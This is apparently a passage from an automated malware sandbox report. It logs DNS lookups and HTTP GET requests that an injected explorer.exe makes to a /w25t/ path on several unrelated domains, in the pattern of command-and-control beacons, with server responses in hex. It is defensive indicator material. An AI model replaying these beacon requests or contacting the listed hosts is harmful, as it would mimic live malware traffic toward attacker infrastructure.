                                                        Feb 25, 2021 15:27:30.970714092 CET5005553192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:31.019571066 CET53500558.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:31.933904886 CET6137453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:31.991522074 CET53613748.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:32.505878925 CET5033953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:32.563148022 CET53503398.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:32.652925014 CET6330753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:32.712477922 CET53633078.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:34.701713085 CET4969453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:34.759253979 CET53496948.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:34.770870924 CET5498253192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:34.839993000 CET53549828.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:35.682416916 CET5001053192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:35.731241941 CET53500108.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:37.031013012 CET6371853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:37.092623949 CET53637188.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:37.407264948 CET6211653192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:37.456093073 CET53621168.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:38.197658062 CET6381653192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:38.256480932 CET53638168.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:39.326152086 CET5501453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:40.326461077 CET5501453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:41.342689037 CET5501453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:41.391722918 CET53550148.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:42.336472988 CET6220853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:43.343368053 CET6220853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:43.394613981 CET53622088.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:44.343007088 CET5757453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:44.394748926 CET53575748.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:45.676320076 CET5181853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:45.725630045 CET53518188.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:47.033123016 CET5662853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:47.085913897 CET53566288.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:48.191987991 CET6077853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:48.243650913 CET53607788.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:49.209219933 CET5379953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:49.257906914 CET53537998.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:50.176558018 CET5468353192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:50.228135109 CET53546838.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:51.125828981 CET5932953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:51.174660921 CET53593298.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:52.146334887 CET6402153192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:52.195430040 CET53640218.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:57.714442968 CET5612953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:57.791071892 CET53561298.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:14.912911892 CET5817753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:14.984534025 CET53581778.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:15.180850029 CET5070053192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:15.232400894 CET53507008.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:20.623471975 CET5406953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:20.691571951 CET53540698.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:25.941293001 CET6117853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:26.025517941 CET53611788.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:31.063088894 CET5701753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:31.136027098 CET53570178.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:36.343516111 CET5632753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:36.406847000 CET53563278.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:39.415992022 CET5024353192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:39.467735052 CET53502438.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:39.870378017 CET6205553192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:39.935050964 CET53620558.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:46.895540953 CET6124953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:47.162172079 CET53612498.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:52.174387932 CET6525253192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:52.288326025 CET53652528.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:57.299858093 CET6436753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:57.367551088 CET53643678.8.8.8192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Feb 25, 2021 15:27:34.770870924 CET192.168.2.68.8.8.80xf69cStandard query (0)doc-08-78-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:27:38.197658062 CET192.168.2.68.8.8.80xe44eStandard query (0)cdn.onenote.netA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.912911892 CET192.168.2.68.8.8.80xce23Standard query (0)www.aserchofalltrades.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:20.623471975 CET192.168.2.68.8.8.80x6a23Standard query (0)www.parentseducationalco-op.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:25.941293001 CET192.168.2.68.8.8.80x489fStandard query (0)www.blackholidayco.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:31.063088894 CET192.168.2.68.8.8.80x777dStandard query (0)www.allsalesvinyl.netA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:36.343516111 CET192.168.2.68.8.8.80x5687Standard query (0)www.pardsoda.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:46.895540953 CET192.168.2.68.8.8.80x1dc8Standard query (0)www.asesorgrupovivir.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:52.174387932 CET192.168.2.68.8.8.80x4206Standard query (0)www.joybirder.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:57.299858093 CET192.168.2.68.8.8.80x584bStandard query (0)www.sixteen3handscottages.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Feb 25, 2021 15:27:34.839993000 CET8.8.8.8192.168.2.60xf69cNo error (0)doc-08-78-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:27:34.839993000 CET8.8.8.8192.168.2.60xf69cNo error (0)googlehosted.l.googleusercontent.com142.250.184.65A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:27:38.256480932 CET8.8.8.8192.168.2.60xe44eNo error (0)cdn.onenote.netcdn.onenote.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)www.aserchofalltrades.comwww0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)www0.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)5f36b111-balancer.wixdns.nettd-balancer-dc11-60-102.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)td-balancer-dc11-60-102.wixdns.net185.230.60.102A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:20.691571951 CET8.8.8.8192.168.2.60x6a23No error (0)www.parentseducationalco-op.comparentseducationalco-op.comCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:20.691571951 CET8.8.8.8192.168.2.60x6a23No error (0)parentseducationalco-op.com34.102.136.180A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:26.025517941 CET8.8.8.8192.168.2.60x489fName error (3)www.blackholidayco.comnonenoneA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:31.136027098 CET8.8.8.8192.168.2.60x777dNo error (0)www.allsalesvinyl.netallsalesvinyl.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:31.136027098 CET8.8.8.8192.168.2.60x777dNo error (0)allsalesvinyl.net34.102.136.180A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:36.406847000 CET8.8.8.8192.168.2.60x5687No error (0)www.pardsoda.com104.21.32.11A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:36.406847000 CET8.8.8.8192.168.2.60x5687No error (0)www.pardsoda.com172.67.182.32A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:47.162172079 CET8.8.8.8192.168.2.60x1dc8Server failure (2)www.asesorgrupovivir.comnonenoneA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:52.288326025 CET8.8.8.8192.168.2.60x4206Server failure (2)www.joybirder.comnonenoneA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:57.367551088 CET8.8.8.8192.168.2.60x584bNo error (0)www.sixteen3handscottages.comsixteen3handscottages.comCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:57.367551088 CET8.8.8.8192.168.2.60x584bNo error (0)sixteen3handscottages.com34.102.136.180A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.aserchofalltrades.com
                                                        • www.parentseducationalco-op.com
                                                        • www.allsalesvinyl.net
                                                        • www.pardsoda.com
                                                        • www.sixteen3handscottages.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.649749185.230.60.10280C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:15.124083996 CET6318OUTGET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.aserchofalltrades.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:15.270668030 CET6320INHTTP/1.1 404 Not Found
                                                        Date: Thu, 25 Feb 2021 14:28:15 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-wix-request-id: 1614263295.2061857739024538739
                                                        vary: Accept-Encoding
                                                        Age: 0
                                                        X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgAmI6NXu6WfqLI/M7f8tcV,2d58ifebGbosy5xc+FRaljJhPW/QGfx+q8yY6tJt4liplW2KIFCnP2WuDwYfqFs95giHFpZ7ywPurTQjYl2cGQ==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,m0j2EEknGIVUW/liY8BLLsk16xozuw6nSXf6CEzK6Aca0sM5c8dDUFHeNaFq0qDu,JLaio/7uvfP647F5CQsGZbrBoTckX0poWZhq63wruFRGp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZZDXl7I7ILTyJojtezEQxYM0d1JjSaSBjnO+SH73qBkvWIHlCalF7YnfvOr2cMPpyw==
                                                        Server: Pepyaka/1.15.10
                                                        Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66
                                                        Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href
                                                        Feb 25, 2021 15:28:15.270728111 CET6321INData Raw: 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d
                                                        Data Ascii: ="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/css" /> ... --> <link rel="stylesheet" href="//static.parastorage.com/services/wix-public/1.299.0/styles/error-pages/styles.css">
                                                        Feb 25, 2021 15:28:15.270781040 CET6322INData Raw: 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27
                                                        Data Ascii: s"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.299.0/'); angular.module('wixErrorPagesApp').constant('baseDomain', 'wix.com'); angular.module('
                                                        Feb 25, 2021 15:28:15.270817041 CET6323INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.64975134.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:20.735161066 CET6333OUTGET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.parentseducationalco-op.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:20.874774933 CET6334INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:20 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "603155b8-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.64975234.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:31.179930925 CET6335OUTGET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.allsalesvinyl.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:31.319639921 CET6335INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "603155b8-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.649753104.21.32.1180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:36.463717937 CET6337OUTGET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1
                                                        Host: www.pardsoda.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:36.840812922 CET6338INHTTP/1.1 404 Not Found
                                                        Date: Thu, 25 Feb 2021 14:28:36 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Set-Cookie: __cfduid=d35892cfcfe1bc318a38c848d3a378eab1614263316; expires=Sat, 27-Mar-21 14:28:36 GMT; path=/; domain=.pardsoda.com; HttpOnly; SameSite=Lax
                                                        Vary: Accept-Encoding
                                                        X-Turbo-Charged-By: LiteSpeed
                                                        CF-Cache-Status: DYNAMIC
                                                        cf-request-id: 087b3088120000fa7893ab1000000001
                                                        Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WkXIJ7%2FAsz6AvZSkytfDz1k50V5knPWTBe82bGry9sZdF6i4ecrchrXd44gYsxTh9Sfky4%2FvUbw16TDqu7N7FE%2B5SueMrWfq%2FJPsAWv7EJdk"}],"group":"cf-nel"}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 62721d201fcefa78-AMS
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 32 38 37 39 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: 2879<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px;
                                                        Feb 25, 2021 15:28:36.840852022 CET6339INData Raw: 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f
                                                        Data Ascii: line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0;
                                                        Feb 25, 2021 15:28:36.840873957 CET6341INData Raw: 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20
                                                        Data Ascii: .reason-text { margin: 20px 0; font-size: 16px; } ul { display: inline-block; list-style: none outside none; margin: 0; padding: 0; }
                                                        Feb 25, 2021 15:28:36.840898991 CET6342INData Raw: 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a
                                                        Data Ascii: info-items ul li { width: 100%; text-align: left; } .additional-info-items ul li:first-child { padding: 20px; } .reason-text { font
                                                        Feb 25, 2021 15:28:36.840924978 CET6343INData Raw: 51 33 43 46 6b 48 78 70 4b 78 68 49 77 74 49 42 77 67 49 75 59 59 34 75 2f 2f 75 56 4a 32 71 70 4c 4b 44 37 51 38 74 32 5a 37 78 70 44 33 6e 36 73 6b 61 39 2f 32 62 4d 39 4d 76 7a 36 6f 47 45 79 58 46 6f 4b 48 66 6d 68 65 6f 65 77 78 39 63 59 65
                                                        Data Ascii: Q3CFkHxpKxhIwtIBwgIuYY4u//uVJ2qpLKD7Q8t2Z7xpD3n6ska9/2bM9Mvz6oGEyXFoKHfmheoewx9cYehVuPHMT4jphyBtNHxHQmDGgBvZjXBuWN2gogbPy6RtcOejNPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLa
